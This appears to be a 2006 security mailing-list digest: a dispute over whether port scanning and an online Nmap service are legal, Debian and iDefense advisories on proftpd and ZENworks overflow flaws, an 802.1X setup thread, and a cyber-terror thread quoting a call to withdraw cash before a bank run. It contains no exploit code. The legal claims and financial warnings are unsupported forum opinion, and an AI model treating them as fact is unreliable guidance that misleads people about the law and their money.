Matousek a ?crit : > We have set limits to prevent abusing of our service. > common, you're calling to get pwned here... > Yes, one can still scan someone other's network, this is in violation with out Terms of Service. > Ouh, now that's scarry. > We log every attempt and we are ready to provide these logs to authorities. > Ever heard of tor ?? > However, everyone who has Internet access is able to download Nmap > and do similar scan. You can do nothing more with our service. > There is no damage you can cause with our service even if it is abused. > We believe that pros are more than cons here, that people will use our service > to fix their issues on their firewalls and networks What about online metasploit & Core Impact too ? ;D Cheers, endrazine- From dudevanwinkle at gmail.com Fri Dec 1 17:24:56 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 12:24:56 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> Its obvious that anyone who hires Stonehenge Consulting services is > Dude> getting someone who cant read. I never said postscanning was illegal. > Dude> i said it "isnt illegal". > > And I'm disagreeing with this. Why? > Dude> I even provided a link to the case in > Dude> georgia that helped decide this. > > If there's caselaw in Georgia, that's useful for Georgia, but > certainly isn't referencable in the 49 other states. So you can't > generalize that. So, you are disagreeing with Kevin who states: http://www.securityfocus.com/news/126 "The ruling does not affect criminal applications of the anti-hacking law, but federal law enforcement officials are generally in agreement that port scanning is not a crime." Do you know of a case where someone was convicted due to a portscan? I can imagine that a portscan may be used in conjunction with other evidence to build a case for intent, but I have not heard of anyone being busted for an nmap scan. I was going to build the case, but it looks like someone has already done it for me: from:http://www.krcf.org/krcfhome/MINDS_NEWYORK/1MoC3e_d.htm Only one published opinion has considered the legality of port scans. That court held that such activity did not violate federal or state computer protection statues or other law. The federal district court for the Northern District of Georgia held that a party who conducted port scans of another party's computer systems did not violate the Computer Fraud and Abuse Act (18 U.S.C. s. 1030) [1], because he neither caused damaged nor gained access to the computers at issue. Moulton v. VC3, 2000 WL 3331091 at *6 (N.D. Ga., Nov. 7, 2000). Nor did the port scans violate state law, because they did not interfere with computer or network activity. References: [1] The Computer Fraud and Abuse Act: [2] Moulton v. VC3, 2000 WL 3331091 (N.D. Ga., Nov. 7, 2000) [3] Computer Crime and Intellectual Property Section, U.S. Department of Justice, Legislative Analysis of the 1996 National Information Infrastructure Protection Act: [4] Computer Crime and Intellectual Property Section, U.S. Department of Justice, Field Guidance on New Authorities That Relate to Computer Crime and Electronic Evidence Enacted in the USA Patriot Act of 2001 --------------------------- So back to my earlier statement, if you nessus someones machine, that would impact their performance and be illegal, a single nmap scan, not so much. Now I am not saying that some hot-shot lawyer wouldnt be able to convince a judge to imprison someone for an nmap scan but while you may be able to convince a judge that OJ didnt do it, murder is still illegal -JP From dudevanwinkle at gmail.com Fri Dec 1 17:34:09 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 12:34:09 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: > > If there's caselaw in Georgia, that's useful for Georgia, but > certainly isn't referencable in the 49 other states. actually, it is. it is called legal precedence From merlyn at stonehenge.com Fri Dec 1 17:36:58 2006 From: merlyn at stonehenge.com (Randal L. Schwartz) Date: 01 Dec 2006 09:36:58 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> Message-ID: <86bqmnsekl.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: >> >> If there's caselaw in Georgia, that's useful for Georgia, but >> certainly isn't referencable in the 49 other states. Dude> actually, it is. it is called legal precedence It wasn't clear from your posting that you were talking about a federal case. In that case, yes, it's caselaw. However, if it was just Georgia state law, that would *not* create case law for any other state. By the way, "caselaw" and "legal precedent" are the same. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From dudevanwinkle at gmail.com Fri Dec 1 16:52:21 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 11:52:21 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com> References: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com> Message-ID: On 12/1/06, Randall M wrote: > > [ > [------------------------------ > [ > [Message: 11 > [Date: Fri, 1 Dec 2006 06:48:38 -0500 > [From: "Dude VanWinkle" > [Subject: Re: [Full-disclosure] Nmap Online > [To: "Mike Huber" > [Cc: full-disclosure at lists.grok.org.uk > [Message-ID: > [ > [Content-Type: text/plain; charset=ISO-8859-1; format=flowed > [ > [On 12/1/06, Mike Huber wrote: > [> first of all, IANAL, but the TOS seem to cover the basics... > [ > [> None-the-less, my 8-ball sees litigation in their future. > [ > [ > [portscanning isnt illegal in the states > [ > [-JP [a lawyer> > [ > [ > > RandallM > > -JP From dudevanwinkle at gmail.com Fri Dec 1 17:45:39 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 12:45:39 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86bqmnsekl.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> <86bqmnsekl.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 09:36:58 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: > >> > >> If there's caselaw in Georgia, that's useful for Georgia, but > >> certainly isn't referencable in the 49 other states. > > Dude> actually, it is. it is called legal precedence > > It wasn't clear from your posting that you were talking about a federal case. well try reading the material I reference before saying that anyone who listens to me is a fool next time plz. > In that case, yes, it's caselaw. However, if it was just Georgia state law, > that would *not* create case law for any other state. > > By the way, "caselaw" and "legal precedent" are the same. thanks for the info, i learned something new today, which makes it a good day. From michael.holstein at csuohio.edu Fri Dec 1 17:58:51 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 01 Dec 2006 12:58:51 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86zma7shm8.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> Message-ID: <45706D5B.5070409@csuohio.edu> > If it can be argued as an "unauthorized access", it's at least a misdemeanor > in many states, felony in some. And you don't want to be on the wrong end of > that prosecution. "Illegal" and "Unlawful" are both fuzzy terms. Basically it's a matter of which side an convince 12 folks who have nothing better to do than drink stale coffee for $6/day. From jmm at debian.org Fri Dec 1 18:11:17 2006 From: jmm at debian.org (Moritz Muehlenhoff) Date: Fri, 1 Dec 2006 19:11:17 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1222-2] New proftpd packages fix several vulnerabilities Message-ID: <20061201181117.GA3274@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1222-2 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 1st, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : proftpd Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5815 CVE-2006-6170 CVE-2006-6171 Debian Bug : 399070 Due to technical problems yesterday's proftpd update lacked a build for the amd64 architecture, which is now available. Several remote vulnerabilities have been discovered in the proftpd FTP daemon, which may lead to the execution of arbitrary code or denial of service. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-5815 It was discovered that a buffer overflow in the sreplace() function may lead to denial of service and possibly the execution of arbitrary code. CVE-2006-6170 It was discovered that a buffer overflow in the mod_tls addon module may lead to the execution of arbitrary code. CVE-2006-6171 It was discovered that insufficient validation of FTP command buffer size limits may lead to denial of service. Due to unclear information this issue was already fixed in DSA-1218 as CVE-2006-5815. For the stable distribution (sarge) these problem has been fixed in version 1.2.10-15sarge3. For the unstable distribution (sid) this problem has been fixed in version 1.3.0-16 of the proftpd-dfsg package. We recommend that you upgrade your proftpd package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3.dsc Size/MD5 checksum: 897 d4dea6caa9438bea9d260f20761393ec http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3.diff.gz Size/MD5 checksum: 128340 4f14cee4723b725983eed3d7d9e7fe39 http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10.orig.tar.gz Size/MD5 checksum: 920495 7d2bc5b4b1eef459a78e55c027a4f3c4 Architecture independent components: http://security.debian.org/pool/updates/main/p/proftpd/proftpd-doc_1.2.10-15sarge3_all.deb Size/MD5 checksum: 422614 c673d2a4e9db616bca66e8c2f992a95d Alpha architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 444532 d4950ecc709597f04a379e4a3f5644f9 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 200874 92481cca4bbbce0f0db4fb16ac0c53af http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 457334 b730aa7d3ff1c08d08bca66168686626 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 476906 15a84985231a886c2d9cfaa108edad31 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 476588 3ae27f992a26986872cfc4e26af3add5 AMD64 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 389136 7bddbc3f2780aa71452dad18e8f1f2aa http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 194638 e1b229291ddf3c0050492c926add1e08 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 400102 2ce57e6d93236508f064b0546d19bf01 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 415450 30b99e2426cf7a3bcfce35dc03b5c39f http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 415232 4a021fe85a08b02051702aafbdfcd893 ARM architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 373966 1c371d644b23ffa23ae4cdb847237048 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 188856 094b34ff2e629e4a2e34a40632130782 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 384130 3a073b4e2ce0a4c006b021bc2a70713c http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 399002 52a258d6db3529dc42f93b3377166f48 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 398846 010ff68a50710591d79e6791a36ebe4e HP Precision architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 403768 625a4174453f9aae518fecf9e4f6cffd http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 194534 d69950a0728249287a953efd0e256d95 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 414946 26cd4464a72e49bf3dd7bae1e6bcb4c5 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 431866 880875bdcf2aa45c40af333a205a9386 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 431612 82c75ec629e6408d19f8b7f4e1704e0b Intel IA-32 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 371322 3fa4ccac9c73bc8c19e075ed49f01a42 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 188924 2bdb4609055c6a77ef45e376f43bb6b8 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 381022 5cc5974e4124b09a5c3a7a04fc4c0dfb http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 396780 1e05de59c612c3b59a0384c6b728909c http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 396546 e7e49a7c96f3c5f1a335bdce31b4a41d Intel IA-64 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 519752 379b681d8139096f30c07adaf360a258 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 207072 6a7a86411c903cfe92848369d8939dc9 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 535426 f6e1da6b7febf2b374ce3d9cf844596e http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 562386 6b9476b33d3eb98e87cda796ef3e1cba http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 562222 ddaf242f3d24e951b9578f2bf37ae4c7 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 332616 7f28eb7a6612422159554511d20c565c http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 187212 97853824e6e354d30d08e5d4f92f866a http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 340948 7cb0f9de38603efd2becbaf8a767860d http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 353236 b8afaa29deb9a2aaa5826fefd92ee051 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 352866 dddab5e89fc109de3892f100d5ea702d Big endian MIPS architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 382502 88e5ef3fca660e28577a39db65f0743b http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 201698 9a79029722afde2e9f9881323f09f523 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 391960 847c19048ee9c921abbcedb0742be96d http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 406524 d89d533478c0e5f9997869122173e627 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 406246 f12661492861e6c6f94f5f2ae57318d4 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 384380 83f0858fa68da448e561f9cfd48fedab http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 201916 8a197d293f4c7d735bd0584ec6ec74ee http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 393456 45fb0f0a6f79be0ebab17ebf7305340f http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 409566 4d33f9e7c059949a27704379228b7119 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 409366 5ee8e0e4dc1c831a2f56ff92404ea1c8 PowerPC architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 384536 67c443041e0f5fdc280952fe849f6905 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 195440 cf7b974f9f75e96ff9eb60afd64ceac0 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 395224 3ef2ae27f6234f181b2934f8656d47a0 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 412098 160500875d6d666fe89ff3590767f205 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 411734 baf2f4a518503428bd46c7528adf3ed0 IBM S/390 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_s390.deb Size/MD5 checksum: 379718 c33ac1f5e3afa17837d6b8a6b46173bc http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_s390.deb Size/MD5 checksum: 193048 f1533436a3741501e67ca8a10781b274 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_s390.deb Size/MD5 checksum: 390196 865bc00469365ae23db91d9a86ef201f http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_s390.deb Size/MD5 checksum: 404046 022be9231922608c55613044285a367e http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_s390.deb Size/MD5 checksum: 403780 a182f9bada4a850d9103f76a6024521a Sun Sparc architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_sparc.deb Size/MD5 checksum: 369766 1ebaaa6c12ee1db33142347ad7bd2256 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_sparc.deb Size/MD5 checksum: 189086 370817d19ca97068c40263ebc64a4345 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_sparc.deb Size/MD5 checksum: 379560 5d3c311d57939b9d6ccc262ad9226845 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_sparc.deb Size/MD5 checksum: 394922 119cdba979f469fce53f1311d15b9ab1 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_sparc.deb Size/MD5 checksum: 394722 ebb293c93ebceaa14edd1ceacc64a3d8 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFcHAOXm3vHE4uyloRAsNJAJsE6gmuF2kQya89NveGSFfuiXf/fgCfVCu6 oggOtxhphnAOhGJRNRHaqrw= =Y3Zf -----END PGP SIGNATURE----- From dave.j.moore at gmail.com Fri Dec 1 12:52:27 2006 From: dave.j.moore at gmail.com (Dave Moore) Date: Fri, 1 Dec 2006 06:52:27 -0600 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: On 12/1/06, Mike Huber wrote: > first of all, IANAL, but the TOS seem to cover the basics... However, I am > unsure whether they would hold up under strict legal scrutiny. As far as I > can tell, they may hold up under US criminal law, but not under civil law, > as tort law has its own wonderful little eccentricities. The best safeguard > they seem to have is that they must log the source IP of all scan > requests... As far as I know, anyone who takes the time to read the nmap > man page should be able to craft a scan which won't be detected by the > scanned host (can someone be a definitive source on this point?), and anyone > taking malicious action ought to be taking sufficient precautions to avoid > detection anyway. None-the-less, my 8-ball sees litigation in their future. All nmap scans are detectable. All port scans are detectable. Just depends on how hard you're looking. From thegesus at gmail.com Fri Dec 1 15:27:47 2006 From: thegesus at gmail.com (TheGesus) Date: Fri, 1 Dec 2006 10:27:47 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <200612011515526141632399@mail.smumn.edu> References: <200612011515526141632399@mail.smumn.edu> Message-ID: <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> On 12/1/06, SDALAN04 at smumn.edu wrote: > I beg to differ Mike, they are trying to play the same lame ass game that the (Bush) Oil industry, trying to raise interest rates because Osama Bin Laden is going to hack everyones account. > > Not so smart, I guess I better withdraw all my money American and buy Euros to be safe? > > > On Friday, December 01, 2006 9:04 AM, Michael Holstein wrote: > >> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. > > > >Date: Fri, 01 Dec 2006 10:04:39 -0500 > >From: Michael Holstein > >To: > >Subject: Re: [Full-disclosure] Financial firms warned of Qaeda cyber attack > > > >and since when is DHS "credible" itself? and why to people scatter every > >time their terrorism "mood ring" changes color? > > > >I guess they don't realize that servers overheat when wrapped with > >plastic and duct tape. > > > >~Mike. > > > >_______________________________________________ > >Full-Disclosure - We believe in it. > >Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >Hosted and sponsored by Secunia - http://secunia.com/ > > > > "Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein > > "Cuanta estupidez en tan poco cerebro!" > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > If you ever plan to get money out of the bank, you better do it now, while the getting is good. In a bank run, the federal government (guardian angel and loyal slave of the banks) would most certainly declare a moratorium on withdrawals. More and more people are hearing the recommendation to "withdraw a little extra cash out of the banks" to prepare for cyber attacks. If as many as 1.32% of bank depositors take their advice and withdraw all their money, the banks will close their doors. Al Qaeda threatens to disrupt the electronic bank payments system. This system contributes about 90% of the US money supply. Without it, 10% of the money supply (the cash & coin) must take over the work of the other 90%. Conclusion: Withdraw and stockpile some cash now. Shoot for at least three months' cash requirements. Don't wait. Start now. ================== -- Paul Milne If you live within five miles of a 7-11, you're toast. (thanks, Paul, wherever you are!) From ozan at cryptos.net Fri Dec 1 19:37:31 2006 From: ozan at cryptos.net (Ozan Ozkara) Date: Fri, 01 Dec 2006 21:37:31 +0200 Subject: [Full-disclosure] 802.1X tool? Message-ID: <1165001851.5566.25.camel@prophecy> Hi folks, I am trying to find a tool which provides automatic client configuration for 802.1X implementation in windows environment. I'm trying to implement 802.1x authentication for both wired and wireless connection. Is there any way to do remote client configuration tool for win32 environment. Will i be able to do that? I'd appreciate any real world experience on the subject. thanks -- Ozan Ozkara -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/de5c8ccb/attachment.bin From michael.holstein at csuohio.edu Fri Dec 1 20:16:09 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 01 Dec 2006 15:16:09 -0500 Subject: [Full-disclosure] 802.1X tool? In-Reply-To: <1165001851.5566.25.camel@prophecy> References: <1165001851.5566.25.camel@prophecy> Message-ID: <45708D89.2030407@csuohio.edu> Meetinghouse (AEGIS) or Funk (Odyssey). Note : Meetinghouse is now owned by Cisco. Cheers, ~Mike. Ozan Ozkara wrote: > Hi folks, > > I am trying to find a tool which provides automatic client configuration > for 802.1X implementation in windows environment. I'm trying to > implement 802.1x authentication for > both wired and wireless connection. Is there any way to do remote client > configuration tool for win32 environment. Will i be able to do that? > > I'd appreciate any real world experience on the subject. > > thanks > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From michael.holstein at csuohio.edu Fri Dec 1 20:30:36 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 01 Dec 2006 15:30:36 -0500 Subject: [Full-disclosure] 802.1X tool? In-Reply-To: <1165001851.5566.25.camel@prophecy> References: <1165001851.5566.25.camel@prophecy> Message-ID: <457090EC.2020804@csuohio.edu> Okay .. wait, maybe I didn't understand your question. Windows XP (post sp1) can natively do 802.1x on both wired and wireless connections. Windows 2000 can do it if you get this : http://support.microsoft.com/kb/313664 You can push the 802.1x details out via GPO. http://technet2.microsoft.com/WindowsServer/en/Library/5506eeef-9e91-4cab-8e1e-3efb504d1b471033.mspx The wired instructions are similar. If you're not in a domain model (ie: you're talking about a college resnet, etc) you're out of luck on the GPOs, but you can do it other ways (package your own script, .reg file, etc .. but telling people to click "ok" on a .reg file is a *bad* thing to do... It gets a bit trickier if you're using client-side certs, more so if you're not using a Microsoft CA to issue them, but certainly not impossible (eg: you've got to import the root and client certs manually, not to mention getting OpenSSL/whatever to cough up ones that MS understands) ... Cheers, Michael Holstein CISSP GCIA Cleveland State University Ozan Ozkara wrote: > Hi folks, > > I am trying to find a tool which provides automatic client configuration > for 802.1X implementation in windows environment. I'm trying to > implement 802.1x authentication for > both wired and wireless connection. Is there any way to do remote client > configuration tool for win32 environment. Will i be able to do that? > > I'd appreciate any real world experience on the subject. > > thanks > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From labs-no-reply at idefense.com Fri Dec 1 21:01:18 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 01 Dec 2006 16:01:18 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.01.06: Novell ZENworks Asset Management Collection Client Heap Overflow Vulnerability Message-ID: <4570981E.3020801@idefense.com> Novell ZENworks Asset Management Collection Client Heap Overflow Vulnerability iDefense Security Advisory 12.01.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 01, 2006 I. BACKGROUND Novell Inc's ZENworks is a set of tools used to automate IT management and business processes across the various computing resources within an organization. The Collection Client provides functionality, as a service, that will supply the Collection Server with information regarding the managed machine's hardware and software configuration. For more information, visit http://www.novell.com/products/zenworks/ II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Novell Inc.'s ZENworks Asset Management could potentially allow an attacker to execute arbitrary code with SYSTEM privileges on Windows or root on the various supported UNIX based operating systems. A heap overflow may occur when processing specially crafted packets sent to the Collection Client daemon. The root cause of this vulnerability is identical to that of the vulnerability in Msg.dll. For more information please consult the Msg.dll advisory. III. ANALYSIS Successful exploitation of this vulnerability could allow a remote attacker to take complete control of the affected system. While researching this vulnerability, iDefense Labs found that the Task Server and Collection Server components were also affected. It seems that the Collection Client is statically linked with the Msg.dll library. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 7.0.0.36 of the CClient.exe and Msg.dll files included with Novell Inc's ZENworks Asset Management 7.0 SP1. Older versions are suspected to be vulnerable as well. V. WORKAROUND iDefense is unaware of an effective workarounds for this issue. VI. VENDOR RESPONSE Novell's ZENworks team has addressed this vulnerability within ZENworks 7 Asset Management SP1 IR11. More information can be found by visiting http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974824.htm . VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/16/2006 Initial vendor notification 10/19/2006 Initial vendor response 12/01/2006 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Eric Detoisien. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES 